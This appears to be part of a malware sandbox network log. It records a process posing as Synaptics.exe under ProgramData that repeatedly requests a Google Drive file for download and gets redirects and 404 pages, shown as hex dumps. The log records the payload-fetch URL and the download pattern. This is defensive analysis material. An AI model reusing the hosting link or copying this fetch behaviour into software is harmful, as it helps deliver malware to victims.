                                                                                            2025-01-02 19:29:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 39 51 74 4e 36 4e 32 57 7a 34 52 59 50 6a 31 6f 4d 79 31 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="G9QtN6N2Wz4RYPj1oMy1lA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.949827216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC69dYK0FNYHSNUpZD9IKA49rX32prAEPTASeClKP0ZyJNn-1eaQnzV0z2yyT73gL2-q
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-WnTvZgPk8Q_1wndmH27oag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 30 66 77 59 36 35 6e 78 50 32 6b 6c 54 6f 30 75 5f 4d 4a 54 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="D0fwY65nxP2klTo0u_MJTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.949843216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5njZ0O6RLPwF0SWoclJGltMA9ZUvaKO9CShYeHIG0Xeh_WonXKwrxn_sDDzpsAiuRV
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x7i3v9nP3K3FdGS-VjK1gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 4c 30 32 74 49 74 55 42 42 6a 4c 45 44 62 7a 5a 73 34 4e 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="EL02tItUBBjLEDbzZs4N4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.949844172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:41 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GBYZJOEP58DamHQXypaS1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.949841216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7d0VWBv34ZQLRsPG3OKChSJYO-WXHJipvBRLR5SjTXcNJ5-6A6pK_3atu750fYmxjw-CTuuP4
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UoRYCGhOzfMkS7MvUI9o1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 72 54 4e 4e 6d 74 78 45 54 44 56 71 6c 46 46 61 75 66 34 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="0rTNNmtxETDVqlFFauf4Qg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.949842172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:41 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:42 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:41 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XXA-Haw4E6X9GHRUwxOdFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.949855172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:43 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:42 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lVzL-2wnwtN1F3aV0BQABw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.949856172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:43 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:42 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A0bJAJpPy6T67Za3wRtDwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.949858216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
